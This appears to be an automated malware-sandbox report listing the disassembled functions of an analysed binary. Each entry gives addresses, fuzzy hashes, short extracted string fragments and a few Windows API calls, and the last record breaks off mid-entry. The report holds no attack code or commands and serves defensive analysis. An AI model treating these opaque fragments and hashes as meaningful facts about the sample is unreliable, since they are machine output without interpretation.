Instruction ID: eaefb09245e6ec5893a60e9a5d887003c542391161e2de6cc5fe5efbd5b1daa0
Opcode Fuzzy Hash: 31d7b4940fb1cd638bc083a3186c21e80f307bd36dd3f8a973313de6b5062c83
Instruction Fuzzy Hash: 490231B6A083518FC7149F25E89136BBBE2AFD6304F08886EE5C18B351D779CD05CB96

Function 004179EC Relevance: 8.5, Strings: 6, Instructions: 960COMMON

Download Yara Rule

Strings

FB, xrefs: 00417BC7
,K, xrefs: 00417BAF
|D, xrefs: 00417BBF
D, xrefs: 00417DBB
HM, xrefs: 00417BB7
\, xrefs: 00418427

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ,K$D$FB$HM$\$|D
API String ID: 0-3390040058
Opcode ID: b39b01138baa8b737a98c87939c1125c00cda35b3786291249252b106d0ad8d6
Instruction ID: fed44d54d66c25b221e2358aba68dc4283a4508054e917384afcdb3283fb976c
Opcode Fuzzy Hash: b39b01138baa8b737a98c87939c1125c00cda35b3786291249252b106d0ad8d6
Instruction Fuzzy Hash: D952E3741083418FD7248F28C8917ABBBF1FF96314F144A6DE0D58B3A1E7789985CB9A

Function 004095E0 Relevance: 7.9, Strings: 6, Instructions: 427COMMON

Download Yara Rule

Strings

Q, xrefs: 0040996D
$8ZY, xrefs: 00409A39
T@AK, xrefs: 00409613
@DFF, xrefs: 00409A7E
I@HS, xrefs: 0040961B
NGKL, xrefs: 0040962B

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: $8ZY$@DFF$I@HS$NGKL$Q$T@AK
API String ID: 0-2870219239
Opcode ID: 0b0e415eee66c380f386ae008601ad8518172b9752a036fcdfb6c9fa8950056b
Instruction ID: 95df06997173e620508c9f5d5c9cd0406bcc2f3840121b1a51241ac7e7b14f29
Opcode Fuzzy Hash: 0b0e415eee66c380f386ae008601ad8518172b9752a036fcdfb6c9fa8950056b
Instruction Fuzzy Hash: 3FD106726083A18BD325CF29C85035BFFE1AF97304F09896DE8D55B382D7798909CB96

Function 00419C50 Relevance: 7.9, APIs: 2, Strings: 2, Instructions: 880COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0041A0F7
FreeLibrary.KERNEL32(?), ref: 0041A139

Strings

vw, xrefs: 00419F1D
?_4Y, xrefs: 00419F40

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: FreeLibrary
String ID: ?_4Y$vw
API String ID: 3664257935-1417362010
Opcode ID: 33213fa58906147b88124249147a61c79e9cb0f5ddaaecfe1c77fdd725279692
Instruction ID: 4f3d8b3f4b54fedc2656aa28db3486a60216738cde992efe3fe26d563fe0a588
Opcode Fuzzy Hash: 33213fa58906147b88124249147a61c79e9cb0f5ddaaecfe1c77fdd725279692
Instruction Fuzzy Hash: F362F6746093019FE724CF24C885B6BBBA2EF85314F58862EF495473E1D378DC968B4A

Function 00409320 Relevance: 7.8, Strings: 6, Instructions: 263COMMON

Download Yara Rule

Strings

% 0(, xrefs: 0040940E
A, xrefs: 00409348
/u]7, xrefs: 00409416
jq, xrefs: 00409399
NN, xrefs: 00409341
{, xrefs: 00409456

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: % 0($/u]7$A$NN$jq${
API String ID: 0-2405101777
Opcode ID: 506fb22a02b729bb397a2ab486950d006a4132dd3afe1e2583815c450ee2fe6a
Instruction ID: a6bb689c75ed011b20da47d09120bf808a39994d7ea378afd4063abc233a1f3b
Opcode Fuzzy Hash: 506fb22a02b729bb397a2ab486950d006a4132dd3afe1e2583815c450ee2fe6a
Instruction Fuzzy Hash: C171C16110C3829AD701CF3A845076BFFE19F97244F1899AEE4D5A7387D778C90AC72A

Function 00404300 Relevance: 6.7, Strings: 5, Instructions: 478COMMON

Download Yara Rule

Strings

), xrefs: 0040437C
IDAT, xrefs: 00404772
IHDR, xrefs: 00404704
), xrefs: 00404386
IEND, xrefs: 004047E3

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: 7e58b3984c111faab164376aeee9e03d6dc04babf11b15a2964e05f5fcc8a812
Instruction ID: ce664f672490ca13b4d848498f92939a66e48447d20e8f07d9811263328cb02d
Opcode Fuzzy Hash: 7e58b3984c111faab164376aeee9e03d6dc04babf11b15a2964e05f5fcc8a812
Instruction Fuzzy Hash: 2202FEB56083808FD704DF28D89076A7BE0EBC5304F15853EEA859B3D2D779D909CB96

Function 0041A7D0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

cPQV, xrefs: 0041A7FF
_, xrefs: 0041A8BC
8@(F, xrefs: 0041A825
5D"J, xrefs: 0041A7E7
(HyN, xrefs: 0041A7EF

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: (HyN$5D"J$8@(F$_$cPQV
API String ID: 0-882278378
Opcode ID: e4db14f2ff1b4a516e44cd31cf774da5d6cd8ec86133c1260a00e09d65e4e522
Instruction ID: b50ad6ff62c53ccff60a3d03f17a64df31a26111982e498c0de7243e75b5efc8
Opcode Fuzzy Hash: e4db14f2ff1b4a516e44cd31cf774da5d6cd8ec86133c1260a00e09d65e4e522
Instruction Fuzzy Hash: 2C61B455204A914ADB2CDF74859333BBAE5DF85308F1891BFC995CE697E938C203878A

Function 00429550 Relevance: 5.8, Strings: 4, Instructions: 798COMMON

Download Yara Rule

Strings

QL, xrefs: 00429E69
P^, xrefs: 00429E79
IS, xrefs: 00429E71
>?, xrefs: 00429D94

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: >?$IS$P^$QL
API String ID: 0-4108102461
Opcode ID: 88217bd13f11f43e90faa3ae2b61b155556f7ce275f9489ab02ca3c9177038fc
Instruction ID: ec946b74b1eecafe0f31add3e4ed1fff7290227d52528ec870a1cf7f3cb67094
Opcode Fuzzy Hash: 88217bd13f11f43e90faa3ae2b61b155556f7ce275f9489ab02ca3c9177038fc
Instruction Fuzzy Hash: 735202B56083518FC724CF29D89122FBBE1EBC5314F588A6EE8D587392D778D805CB4A

Function 0043F780 Relevance: 5.6, Strings: 4, Instructions: 592COMMON

Download Yara Rule

Strings

52#0, xrefs: 0043F7EF
S"(w, xrefs: 0043FAD2
S"(w, xrefs: 0043F870
f, xrefs: 0043FA2D

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID: 52#0$S"(w$S"(w$f
API String ID: 2994545307-4029711564
Opcode ID: ae63b673a0b0a416c261b1a31697c3b58a5c3cae6318bfd18ca4ba68b450eb83
Instruction ID: 1d3eaefe24023bb8475d80e25745d3901184814afd3c98fd597ef951ad948964
Opcode Fuzzy Hash: ae63b673a0b0a416c261b1a31697c3b58a5c3cae6318bfd18ca4ba68b450eb83
Instruction Fuzzy Hash: 9E22B0719083518FD724CF18C89172BBBE1FB89314F189A3EE8D5473A1D779AC098B96

Function 0042C01F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 310COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042C18D
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042C38A

Strings

]>h<, xrefs: 0042C269

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ]>h<
API String ID: 237503144-3030212049
Opcode ID: d7318cb16bc290663b06ea83303a7405aaf581225c816108c78ce5716fee262b
Instruction ID: 2c2c9d8b9b922c228154d387dd0a97efc680e5da2f3b5c5d267da10629c87be9
Opcode Fuzzy Hash: d7318cb16bc290663b06ea83303a7405aaf581225c816108c78ce5716fee262b
Instruction Fuzzy Hash: 0AB1E9B2A412048FC714CF68C981BDABFF2FB85314F198168D454EF396D379D9068B90

Function 00426570 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 270COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042668D
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004266FF

Strings

Ikd%, xrefs: 00426660

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: Ikd%
API String ID: 237503144-3377436302
Opcode ID: 5c43b1796fb31f43282cd12d0d31044a526e431ee0aed5cf96746a1505e62a3a
Instruction ID: b2cd1c1b60de0e74f6a4abb50350f36cdf64fa7da96206ebbc9461524b8530c7
Opcode Fuzzy Hash: 5c43b1796fb31f43282cd12d0d31044a526e431ee0aed5cf96746a1505e62a3a
Instruction Fuzzy Hash: C0A1A8B1E003289FEB10CFA8D8857DEBBB0FB45318F20416DD555AB281E7B5594ACF51

Function 00422AA0 Relevance: 4.3, Strings: 3, Instructions: 509COMMON

Download Yara Rule

Strings

1>?<, xrefs: 00422BD8
t$, xrefs: 00422F26
-, xrefs: 00422C95

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: 1>?<$t$$-
API String ID: 0-1214471300
Opcode ID: 2906cd62b7a5bf91a71225e96c96bb225016172d889f6437d13e77204bd26af6
Instruction ID: dba060d6998836796beb509b7753e3f738f4a6062137daec1396282dcf945ed6
Opcode Fuzzy Hash: 2906cd62b7a5bf91a71225e96c96bb225016172d889f6437d13e77204bd26af6
Instruction Fuzzy Hash: 57E110B16083509BD714CF28D991B6BBBE1EFC5314F18892DF9858B391EBB8D805CB46

Function 00441ED0 Relevance: 4.2, Strings: 3, Instructions: 491COMMON

Download Yara Rule

Strings

""D, xrefs: 004421D2
ZJ6, xrefs: 00442339
ZJ6, xrefs: 004422EF

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ""D$ZJ6$ZJ6
API String ID: 0-2406275814
Opcode ID: 87939fb2e7645bee2a87bed389e4343139ad4afafb806a172b5db52c52d98214
Instruction ID: 59235f9668095f34827a16bf1dad1752cb08352eb966276c88087e9e676e5e22
Opcode Fuzzy Hash: 87939fb2e7645bee2a87bed389e4343139ad4afafb806a172b5db52c52d98214
Instruction Fuzzy Hash: 4DF1DD39A09310CFD344CF68E8D061AB7E1FB8A314F0E89BDE98597361C7B5A845CB85

Function 00442000 Relevance: 4.2, Strings: 3, Instructions: 400COMMON

Download Yara Rule

Strings

""D, xrefs: 004421D2
ZJ6, xrefs: 00442339
ZJ6, xrefs: 004422EF

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ""D$ZJ6$ZJ6
API String ID: 0-2406275814
Opcode ID: be7b73b9ef0da9d3305b7fe35d60b09822ae9781c080aca66a722656a629949c
Instruction ID: 92feed256c8a80a43553d29bc2a6294dc615c436919e722ba049a465ffb63cd3
Opcode Fuzzy Hash: be7b73b9ef0da9d3305b7fe35d60b09822ae9781c080aca66a722656a629949c
Instruction Fuzzy Hash: F6D1FF39A09350CFD348CF68E8D062BB7E2BBCA314F0A85BDE98557361C6B59845CB85

Function 0040B0F0 Relevance: 4.1, Strings: 3, Instructions: 396COMMON

Download Yara Rule

Strings

A, xrefs: 0040B563
YqMC, xrefs: 0040B4B4
;, xrefs: 0040B115

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ;$A$YqMC
API String ID: 0-1057406701
Opcode ID: 6a8e45171c2bd00d8d871e58b1634dcf854b1099b8ec01f9a2110ab06005a89b
Instruction ID: 5428a89de8b2b47a2e1a9d9091127bc23b2c5d860d483feb6154fe7668ad83d8
Opcode Fuzzy Hash: 6a8e45171c2bd00d8d871e58b1634dcf854b1099b8ec01f9a2110ab06005a89b
Instruction Fuzzy Hash: 34D1D27150C3509BD324CF24985036BFBE1EF81708F58896EE8D56B386D779990ACB8B

Function 0041C908 Relevance: 4.1, Strings: 3, Instructions: 392COMMON

Download Yara Rule

Strings

!., xrefs: 0041C986
^2^0, xrefs: 0041C963
I"M , xrefs: 0041C97F

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: !.$I"M $^2^0
API String ID: 0-3146913702
Opcode ID: 808195594f96b2ec5d6647f0773b1deb6a2647d1acf8de0eabf03ef12dc429c9
Instruction ID: c3ce99f87b5b5f0ae92ae3f3abaa1e1930692687d20158e0718e96e24832e6b2
Opcode Fuzzy Hash: 808195594f96b2ec5d6647f0773b1deb6a2647d1acf8de0eabf03ef12dc429c9
Instruction Fuzzy Hash: 3BC13772E502158BCB14CFA8CC813EEB7B2EF90324F19812AD855AF395E7789D46C784

Function 00442100 Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

""D, xrefs: 004421D2
ZJ6, xrefs: 00442339
ZJ6, xrefs: 004422EF

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ""D$ZJ6$ZJ6
API String ID: 0-2406275814
Opcode ID: 2dbd5fccea3abc3039cafaf4d3c5cb0c4d53f2a4135cc4db4b0db1e0cef934f3
Instruction ID: 7c9cb482d8451da1bf47a27b701d606ddca4f501d173b848d6dcf71c5411b6b9
Opcode Fuzzy Hash: 2dbd5fccea3abc3039cafaf4d3c5cb0c4d53f2a4135cc4db4b0db1e0cef934f3
Instruction Fuzzy Hash: 14B1E23AA09350CFC344CF68E8D061AB7E1FBCA315F0E85BDE98597361D6B4A851CB85

Function 0041C500 Relevance: 4.1, Strings: 3, Instructions: 310COMMON

Download Yara Rule

Strings

4C|], xrefs: 0041C7C4
No)i, xrefs: 0041C7E7
9G9A, xrefs: 0041C7BD

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: 4C|]$9G9A$No)i
API String ID: 0-2470860804
Opcode ID: 1be76de5d73747d3591fde655ec93625fe41cb30e93f82cf6507e298def12014
Instruction ID: 566133b4caf8b4d1d5b698c3e212e7d7874f4a63098fca3afc73f72cb19fab37
Opcode Fuzzy Hash: 1be76de5d73747d3591fde655ec93625fe41cb30e93f82cf6507e298def12014
Instruction Fuzzy Hash: 79B1F3B5E042189FDF10CFA5E8917EE7BB2FF45314F14812EE944AB241DB3A4916CB98

Function 004421B0 Relevance: 4.0, Strings: 3, Instructions: 298COMMON

Download Yara Rule

Strings

""D, xrefs: 004421D2
ZJ6, xrefs: 00442339
ZJ6, xrefs: 004422EF

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ""D$ZJ6$ZJ6
API String ID: 0-2406275814
Opcode ID: 8ad5d7e6e6bb539f3520499c9807450a51a2e36106c0287886beda26fec08fe0
Instruction ID: 0977684d5426d6e3bba686ba6bb34cf6bb0e9544c5abfb6cccf0ebfcc6941c68
Opcode Fuzzy Hash: 8ad5d7e6e6bb539f3520499c9807450a51a2e36106c0287886beda26fec08fe0
Instruction Fuzzy Hash: B291C036A09350CFC314CF68E8D062AB7E1FFCA315F0A89BDE88597361D675A841CB85

Function 0042B200 Relevance: 3.5, APIs: 2, Instructions: 481COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042B2C3
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042B349

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 1892852c7cfd9d60664193ea0c0d1002581ed50a52ad0d6b5de248b0eb1315b3
Instruction ID: 9692829131d8cd574de4e9aff6029e5fa032de8c4546c6c0eb7999e166413e96
Opcode Fuzzy Hash: 1892852c7cfd9d60664193ea0c0d1002581ed50a52ad0d6b5de248b0eb1315b3
Instruction Fuzzy Hash: 03E1E0B26083118BD724DF28D85176FB7E2EFC6304F05893DE4859B391E775990ACB86

Function 00414BF0 Relevance: 3.5, Strings: 2, Instructions: 952COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00415050
0p, xrefs: 00414F97

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: NP,?$0p
API String ID: 0-716401777
Opcode ID: 4f2e39567ccc7d35f4e93df7256cc5b097243ccadf6eba448b38f1a46cf7fca7
Instruction ID: 346f1393eb1b41d98dc6a5546e187b6413121618c1d7b4ec72e690e296fe2a5a
Opcode Fuzzy Hash: 4f2e39567ccc7d35f4e93df7256cc5b097243ccadf6eba448b38f1a46cf7fca7
Instruction Fuzzy Hash: EE524675608300DBD7149F28DC927AB73A1FBC6324F18862EF595873E1EB389945CB89

Function 00404E80 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

0, xrefs: 0040579B
8, xrefs: 00405793

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: a82b5f3ada2a7d392e0b3c0ff4f8feadec9af6f2b2e591a9e3dd2812017c203a
Instruction ID: 06a683d8c32af70d1e13885ffda14dea1ed67374b1a7926836ad4b240a55f008
Opcode Fuzzy Hash: a82b5f3ada2a7d392e0b3c0ff4f8feadec9af6f2b2e591a9e3dd2812017c203a
Instruction Fuzzy Hash: D4722071508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96

Function 00427780 Relevance: 3.1, Strings: 2, Instructions: 593COMMON

Download Yara Rule

Strings

{B, xrefs: 00427771
@~B, xrefs: 00427545

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: @~B${B
API String ID: 0-3101840507
Opcode ID: cf9a32c59d2553a36b2cf95954f3910fef61001462d2a9644c3a5815e49a7bb6
Instruction ID: f28ca416327b45c2a22fc91780be6ae0c275560112f0fecaaf1df2140cb76447
Opcode Fuzzy Hash: cf9a32c59d2553a36b2cf95954f3910fef61001462d2a9644c3a5815e49a7bb6
Instruction Fuzzy Hash: C8120A76F04226CFCB14CF68D8916AEB7B2FF89310F5981A9D451AB364D738AD42CB44

Function 0041C163 Relevance: 2.8, Strings: 2, Instructions: 307COMMON

Download Yara Rule

Strings

*@Up, xrefs: 0041C258
t1{@, xrefs: 0041C3C0

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: *@Up$t1{@
API String ID: 0-3978741162
Opcode ID: 3694cee52a9e6501bf9d64defde4f10300f9eceeb5e79185d9544edbd6cc3c21
Instruction ID: 189afaff5dc706ae680378de74cfbbcc7411c3138a61ca05d8e1a2e275c4ccca
Opcode Fuzzy Hash: 3694cee52a9e6501bf9d64defde4f10300f9eceeb5e79185d9544edbd6cc3c21
Instruction Fuzzy Hash: 15A1F2716406418BD3288F29C8A1673F7F2FF96314B28819ED496CF791E738E886CB55

Function 00442240 Relevance: 2.8, Strings: 2, Instructions: 307COMMON

Download Yara Rule

Strings

ZJ6, xrefs: 00442339
ZJ6, xrefs: 004422EF

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ZJ6$ZJ6
API String ID: 0-3082319911
Opcode ID: f6467e44167082b0a4559558dd92b73fc6657fa39fe9859baa159c98831bd983
Instruction ID: a38f0a5d6fc17b8e65cc580bf84fa9877e84ffae83c71df20ba77ba2b128e79a
Opcode Fuzzy Hash: f6467e44167082b0a4559558dd92b73fc6657fa39fe9859baa159c98831bd983
Instruction Fuzzy Hash: 51A1F036A09350CFD314CF28D8D062BFBE2BBCA314F4A896DE88497351D675A845CB86

Function 004425C0 Relevance: 2.8, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

nC9`, xrefs: 004425DB
sC9`, xrefs: 00442647

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: nC9`$sC9`
API String ID: 0-2626960768
Opcode ID: bbbaf79ad0db15cdda293dfec4d51dafdf809d6fb65547da37bc2e3d0ee67af2
Instruction ID: 5aee1fd90c1436b961ac68c3d036ce812c302d5b83287c786170fe8fdea8e8ea
Opcode Fuzzy Hash: bbbaf79ad0db15cdda293dfec4d51dafdf809d6fb65547da37bc2e3d0ee67af2
Instruction Fuzzy Hash: ECA1DE76A193118FD308DF28D99022BB7E2FBC5304F1A897DE9D987394D674D942CB42

Function 0043108D Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

`fTa, xrefs: 00431421
5, xrefs: 00431372

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: 5$`fTa
API String ID: 0-1110062966
Opcode ID: d6a9d7f45650392175d68f22ffcbd0cfe5b42fd15b6310d85aaf9417cbd22f3b
Instruction ID: 27f9911a6404eb97eece8782e9105ef40775b2040b801e9c0d2753d050faac27
Opcode Fuzzy Hash: d6a9d7f45650392175d68f22ffcbd0cfe5b42fd15b6310d85aaf9417cbd22f3b
Instruction Fuzzy Hash: E351F77010C3D14BE7198B3990A077BFFE09FA7349F28995DE5D28B2A2D77E88058716

Function 004311BC Relevance: 2.7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

Strings

`fTa, xrefs: 00431421
5, xrefs: 00431372

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: 5$`fTa
API String ID: 0-1110062966
Opcode ID: a72a08381fb75fdb186be357a89cb4a45d5fd479b897818f9444617bf476b785
Instruction ID: 561f42c7934bedaac5fe8c569bf6d6fe142143ca5911108d80cee3e883c8a2b3
Opcode Fuzzy Hash: a72a08381fb75fdb186be357a89cb4a45d5fd479b897818f9444617bf476b785
Instruction Fuzzy Hash: 0951F77010C3C14BE7198B39906077BFFE09FA7349F28995DE5D28B2A2D77A8805C756

Function 004124DD Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

q, xrefs: 0041254D
], xrefs: 004124F0

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ]$q
API String ID: 0-1305462013
Opcode ID: 9a12cccfc4dcb871410783322cdb203cc87cb0e53b507c0f96e0fe996f547084
Instruction ID: e7d5a9f592fdb3d43da8475927459afe5b7d6a5c4d385279e5a41ddc2b525adb
